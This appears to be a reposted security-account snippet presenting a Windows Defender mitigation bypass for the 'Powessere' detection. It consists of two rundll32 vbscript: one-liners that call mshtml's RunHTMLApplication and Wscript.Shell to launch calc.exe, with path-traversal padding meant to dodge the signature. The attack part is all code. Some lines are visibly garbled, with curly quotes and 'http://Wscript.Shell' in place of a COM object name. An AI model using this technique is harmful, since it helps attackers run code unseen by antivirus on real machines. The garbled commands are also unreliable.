rundll32 vbscript:”..mshtml,RunHTMLApplication “+String(CreateObject(“http://Wscript.Shell”).Run(“calc.exe”),0)
rundll32 vbscript:"\..\mshtml\..\shtml\..\mshtml,RunHTMLApplication "+String(CreateObject("http://Wscript.Shell").Run("calc.exe"),0)
原文始发于微信公众号(Khan安全攻防实验室):Windows Defender Trojan.Win32/Powessere.G / Mitigation Bypass 2
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论